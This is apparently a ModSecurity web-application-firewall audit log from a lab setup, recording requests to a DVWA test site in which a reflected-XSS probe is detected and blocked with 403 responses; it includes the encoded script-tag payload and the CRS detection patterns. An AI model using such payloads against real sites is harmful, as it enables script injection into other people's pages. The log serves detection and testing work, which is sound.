{"transaction":{"time":"13/May/2017:12:29:04 --0400","transaction_id":"WRc0UH8AAQEAAAkZ0BIAAAAE","remote_address":"192.168.75.145","remote_port":56780,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0UH8AAQEAAAkZ0BIAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":580,"p2":3113,"p3":0,"p4":0,"p5":162,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4oAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Wed, 10 May 2017 02:17:21 GMT","If-None-Match":"\"cca-54f22127f468d-gzip\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Wed, 10 May 2017 02:17:21 GMT","ETag":"\"cca-54f22127f468d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc0Vn8AAQEAAAkVV4oAAAAA\"]"],"stopwatch":{"p1":386,"p2":977,"p3":75,"p4":547,"p5":64,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:29:10 --0400","transaction_id":"WRc0Vn8AAQEAAAkVV4sAAAAA","remote_address":"127.0.0.1","remote_port":42048,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:26:00 GMT","If-None-Match":"\"1a8-54f6a470f3057\"","Cache-Control":"max-age=0"}},"response":{"protocol":"HTTP/1.1","status":304,"headers":{"Last-Modified":"Sat, 13 May 2017 16:26:00 GMT","ETag":"\"1a8-54f6a470f3057\"","Accept-Ranges":"bytes","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc0Vn8AAQEAAAkVV4sAAAAA\"]"],"stopwatch":{"p1":608,"p2":1233,"p3":59,"p4":146,"p5":63,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:30:13 --0400","transaction_id":"WRc0lX8AAQEAAAmHBJYAAAAF","remote_address":"192.168.75.145","remote_port":56782,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 